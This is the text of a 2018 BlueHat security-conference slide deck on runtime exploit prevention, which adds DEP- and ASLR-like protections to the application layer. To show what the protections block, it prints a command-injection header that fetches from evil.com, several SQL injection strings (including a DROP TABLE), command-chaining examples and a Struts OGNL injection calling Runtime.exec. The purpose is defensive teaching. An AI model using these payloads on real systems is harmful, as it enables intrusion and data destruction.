BlueHat v18 || Dep for the app layer - time for app sec to grow up

1WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018
CONFIDENTIAL
CONTRASTSECURITY.COM
Arshan Dabirsiaghi Chief Scientist |
September 26, 2018
DEP FOR THE APP LAYER
Time for AppSec to Grow Up
BLUEHAT 2018
Matt Austin Director of Security Research

CONFIDENTIAL
WHO ARE WE?
Arshan Dabirsiaghi
Founder & Chief Scientist
Career application security researcher.
Credited with many CVEs.
Released popular application security tools
including AntiSamy and JavaSnoop.
Blackhat speaker.
Absolutely hates the above picture.
Matt Austin
Director of Security Research
Career application security researcher.
Credited with way more CVEs than Arshan.
Hall of Fame Bounty Hunter for Facebook, Google.
Defcon speaker.
Absolutely hates the above picture.

CONFIDENTIAL
TAILORED SECURITY NEVER SCALES: JAVA
POLICY

CONFIDENTIAL
TAILORED SECURITY NEVER SCALES: CONTENT
SECURITY POLICY
From Twitter (source: OWASP CSP CheatSheet)

CONFIDENTIAL
TAILORED SECURITY NEVER SCALES: SELINUX
allow staff_usertype unreserved_port_t : udp_socket name_bind ;
DT allow staff_usertype unreserved_port_type : tcp_socket name_bind ; [ selinuxuser_tcp_server ]
DT allow nsswitch_domain unreserved_port_t : tcp_socket { name_bind name_connect } ; [ nis_enabled ]
DT allow nsswitch_domain unreserved_port_t : udp_socket name_bind ; [ nis_enabled ]

CONFIDENTIAL
TAILORED SECURITY NEVER SCALES: THE WAF
SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel “@eq 0”
“id:9005000,
phase:1,
pass,
t:non,
nolog,
skipAfter:END=CPANEL”
From an actual WAF
vendor datasheet!

CONFIDENTIAL
SECURITY GETS BETTER CLOSER TO BOOM
Network
Firewall
Host
Firewall
IDS + IPS DEP + ASLR
WAF ?

CONFIDENTIAL
LET’S TALK ABOUT WHAT WORKS
SECURITY
MECHANISM
STATUS
DEP Prevents user-provided cargo code from executing
ASLR Prevents the attacker from knowing where their desired code is
Stack Cookies
Infer the corruption of application integrity
Browser Sandbox
Raises the cost of exploit development

CONFIDENTIAL
WHERE SHOULD WE INVEST?
Developer
Training
Secure
Coding
APIs
Internal
Product
Testing
Secure
Coding
Guidelines
DEP
ASLR
SEHOP
SafeSEH
Why does AppSec
only include this?
These people-centric
activities don’t scale!
• Up-front and ongoing cost built on hope
• Hope they use
• Hope they understand
• Hope they catch the bug
• Invisible to users
• Big up-front cost
• Kill bug classes, forever
• Invisible to developer and users

CONFIDENTIAL
CONFIDENTIAL
PORTING
PROTECTIONS
To the Application Layer

CONFIDENTIAL
USING AN AGENT TO ADD SECURITY

CONFIDENTIAL

CONFIDENTIAL
RUNTIME EXPLOIT PREVENTION (REP)
INPUT
CLASSIFICATIO
N
VOLUMETRI
C
ANALYSIS
INPUT
TRACING
SEMANTIC
ANALYSIS
HARDENING SANDBOXING
Identify clear attacks
and prevent
processing
Reject malformed
Identify patterns
of input that
represent an
attack
Identify when
user input
introduces code
that will run in
an interpreter
Detect input
causing injection
and malicious
behavior
Enable, improve,
configure,
enhance, apply
During risky
behaviors, prevent
execution of
common exploit
paths

CONFIDENTIAL
PROTECTION TYPE 1 INPUT CLASSIFICATION
APPLIES TO:
Obvious Exploit Attempts
HTTP Method Tampering
Header Tampering

CONFIDENTIAL
JEFF /widgets HTTP/1.0
Host: foo.com
Content-Length: -150
Content-Type: aaaaaaaaaaaaaaa[... 1024 ...]
Accept: */*;’ /bin/bash -c wget http://evil.com/
widget=selected_widget Command injection
attack -- stop at perimeter
PROTECTION TYPE 1 INPUT CLASSIFICATION
-150
aaaaaaaaaaaaaaa[... 1024 ...]
*/*;’ /bin/bash -c wget http://evil.com/
Definitely Invalid Value
No Content Type
should be longer
than 25 characters

CONFIDENTIAL
APPLIES TO:
Regex DoS
Padding Oracle
PROTECTION TYPE 2 VOLUMETRIC ANALYSIS

CONFIDENTIAL
import javax.crypto.Cipher;
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.DENCRYPT_MODE, key, vi);
byte[] encrypted = cipher.doFinal(userInput); // Unhandled when error
Padding Oracle

CONFIDENTIAL
Hook the exception handler: javax.crypto.BadPaddingException;
Track errors (by IP):
Block the attacker:
Padding Oracle
1
3
2

CONFIDENTIAL
PROTECTION TYPE 3 INPUT TRACING
APPLIES TO:
SQL Injection
Expression Language Injection
Local File Include
… many others
Apps and Data
Interpreter

CONFIDENTIAL
Username: test@example.com' or 1=1;--
Password: anything...
DEP #1: Prevent Cargo Code From Executing
string user = Request.Parameters['username']
// build the query
cmd.CommandText = "SELECT * FROM USERS where userId='" + username + "'…;
…
sqlConnection1.Open();
// execute the query
reader = cmd.ExecuteReader();
sqlConnection1.Close();
Response.StatusCode = 403;
Untrusted Data Received
POST /login/ name=test@example.com' or 1=1;--
Injected Query Blocked
test@example.com' or 1=1;--
Response Safely Redirected
content-type: text/html; charset=UTF-8
status: 403 (forbidden)

CONFIDENTIAL
cmd.ExecuteReader() //cmd.CommandText
SELECT * FROM USERS where userId='test@example.com' or 1=1;-- ' and password='anything...'
| | |________| | | |________________| |_| | | |_____________________________|
| | Table ID | | Literal | op | | Comment Block
| | | |_______________________| |_|
| Result | | Column = Expression |
| | |________________________________|
| | Or Expression |
| |______________________________________|
| WHERE Clause |
|__________________________________________________________|
SELECT Statement
DEP #2: Cargo Code Attempts Execution

CONFIDENTIAL
Untrusted User Input
test@example.com' or 1=1;--1
3
2
4
Sink Called
cmd.CommandText = "SELECT * FROM USERS where userId='" + user + "'…;
Query analyzed (token boundary crossed)
SELECT * FROM USERS where userId='test@example.com’ or 1=1;--
' and password='anything’
4Block the action!
4
DEP #3: Trigger The Rule

CONFIDENTIAL
PROTECTION TYPE 4 SEMANTIC ANALYSIS
APPLIES TO:
SQL Injection
Command Injection

CONFIDENTIAL
Why Do We Need Semantic Analysis if We Have Input Tracing?
Apps and Data
3rd Party
Interpreter
Another App

CONFIDENTIAL
SQL: Tautology-Based Attacks
SELECT * FROM USERS where userId='test@example.com' or 1 <> sqrt(4);
| | | |__| |___________|
| | | op Tautology |
| | | |
| | |__________________________________________|
| | Or Expression |
| |________________________________________________|
| WHERE Clause |
|____________________________________________________________________|
SELECT Statement
Can’t do this without
pseudo-evaluation!

CONFIDENTIAL
SQL: Union to Unsafe Table
SELECT * FROM USERS where userId='test@example.com' UNION SELECT 1 FROM information_schema.tables
| |_____________________________| | | |_______________________|
| WHERE clause | | | Table Name |
|_________________________________________________| | |_____________________________________|
SELECT statement | SELECT statement |
|___________________________________________|
Union statement

CONFIDENTIAL
SELECT * FROM USERS where userId='test@example.com' ; DROP TABLE USERS;
| |_____________________________| |_________________|
| WHERE Clause | Chained Statement
|_________________________________________________|
SELECT Statement
SQL: Chaining-Based Attacks

CONFIDENTIAL
ping -c 4 $(echo 8.8.8.8`sleep 5`)
| | | |_______||
| | | Expansion |
| | |______________________|
| | Expansion |
| |___________________________|
| Suffix |
|_________________________________|
Script
ping -c 4 8.8.8.8 ; sleep 5
| |__________| |_| |______|
| Suffix | Script
|________________|
Script
Variable Expansion: Command Chaining:
Command Injection

CONFIDENTIAL
PROTECTION TYPE 5 HARDENING
APPLIES TO:
XXE

CONFIDENTIAL
java.lang.Runtime
JVM
Other Code
What Does “ASLR” Look Like For an App?

CONFIDENTIAL
java.lang.Runtime
JVM
Other Code
java.lang.$$0x7A69$$Runtime
What Does “ASLR” Look Like For an App?

CONFIDENTIAL
java.lang.Runtime
JVM
Exploit Code
Bypassing App “ASLR” #1: Object Graph

CONFIDENTIAL
java.lang.Runtime
JVM
Exploit Codex

CONFIDENTIAL
java.lang.Runtime
JVM
Exploit Codex
java.lang.AnotherJavaType
Find a known type that
already has a reference
to java.lang.Runtime.
Use its reference
instead of trying to
lookup or create your
own!

CONFIDENTIAL
java.lang.Runtime
JVM
Exploit Code
Bypassing App “ASLR” #2: Lookup By Non-Name Signature

CONFIDENTIAL
java.lang.Runtime
JVM
Exploit Code
x

CONFIDENTIAL
java.lang.Runtime
JVM
Exploit Code
x
java.lang.Instrumentation.getAllLoadedClasses()
Loop through every
class. Does it have the
same number of fields
as Runtime? Same
types? Same
serialVersionUID? Try
it! If not, go to the next
one!
Only 20k classes!

CONFIDENTIAL
InputStream is = httpRequest.getInputStream();
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder docBuilder = factory.newDocumentBuilder();
doc = docBuilder.parse(is);
// BEGIN CONTRAST INJECTION
try {
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
} catch (Throwable t) { }
// END CONTRAST INJECTION
Insecure by default!
Just-in-Time Security!
BOOM!

CONFIDENTIAL
PROTECTION TYPE 6 SANDBOXING
APPLIES TO:
Deserialization
.. Many others

CONFIDENTIAL
<untrusted code>
Browser
Powerful API calls
Operating System
The cost of exploit
development is raised
by forcing the attacker
to discover sandbox
bypasses.
SANDBOX
Browser (Application) Sandbox

CONFIDENTIAL
OGNL Runtime
x
JVM
Struts CVE-2018-1176 – OGNL Injection

CONFIDENTIAL
GET
/struts2-showcase
/${(
_memberAccess[“allowStaticMethodAccess”]=true,
#a=@java.lang.Runtime@getRuntime().exec(‘id’)...
)}
/actionChain1.action
HTTP/1.0

CONFIDENTIAL
com.opensymphony.xwork2.ActionProxy.getMethod()
...
↳ognl.Ognl.getValue(Ognl.java)
↳ognl.OgnlUtil.compileAndExecute(OgnlUtil.java:405)
↳ ...
↳java.lang.Runtime.exec(Runtime.java:152)
Source
Start “sandbox”
Blocked method

CONFIDENTIAL
COMBINING 3 PROTECTION STRATEGIES ON
OGNL INJECTION
45
INPUT
CLASSIFICATIO
N
VOLUMETRI
C
ANALYSIS
INPUT
TRACING
SEMANTIC
ANALYSIS
HARDENING SANDBOXING
Identify obvious OGNL
in request and block
Identify input
that could
possibly be
OGNL from the
input and check
if it made it to
the OGNL API
and is about to
be evaluated
Prevent common
exploit paths from
working if within
OGNL evaluation

CONFIDENTIAL
GOALS OF RUNTIME EXPLOIT PREVENTION (REP)
• SQL Injection
• Padding Oracle
• XML External Entity (XXE)
• …
KILL BUG CLASSES
• Practically no performance overhead
BE INVISIBLE TO END USERS
• No code changes or rule tuning
BE INVISIBLE TO DEVELOPERS

CONFIDENTIAL
CONFIDENTIAL
CONCLUSIONS

CONFIDENTIAL
DEP (+ ASLR etc) REP
Inject into app runtime
as an agent
Aim to prevent many
unique exploitation
conditions in many
different interpreters
Weave around high
level APIs from the
runtime, OSS and
commercial packages
Inject by OS and
compiler
Aim to prevent
EIP=attacker_controlled
(1 interpreter, the CPU)
Weave around meta-
programming points
IN SUMMARY

CONFIDENTIAL
HOW DO WE GET THERE?
.NET Ecosystem
Microsoft
1. Request Processing API
2. SQL API
3. XML API
RUNTIME
AGENT
Node.js Ecosystem
express (OSS)
• Request Processing API
knex.js
(OSS)
• SQL API
xml-parser (OSS)
• XML API
RUNTIME
AGENT

CONFIDENTIAL
CONTRAST COMMUNITY EDITION
16M DEVELOPERS IN THE
WORLD
ONLY 6% HAVE ACCESS TO
DECENT SECURITY TOOLS
Totally free and full-strength application security platform:
• Assess web apps and APIs for vulnerabilities
• Monitor open source
• Runtime exploit prevention
Faster, more accurate, more scalable, better integrated,
and more DevSecOps-friendly than any other application
security solution.
Coming Soon:
Integrations:

CONFIDENTIAL
THANK YOU
Arshan Dabirsiaghi | arshan.dabirsiaghi@contrastsecurity.com
Matt Austin | matt.austin@contrastsecurity.com

BlueHat v18 || Dep for the app layer - time for app sec to grow up

More Related Content

What's hot (20)

Similar to BlueHat v18 || Dep for the app layer - time for app sec to grow up (20)

More from BlueHat Security Conference (20)

Recently uploaded (20)

BlueHat v18 || Dep for the app layer - time for app sec to grow up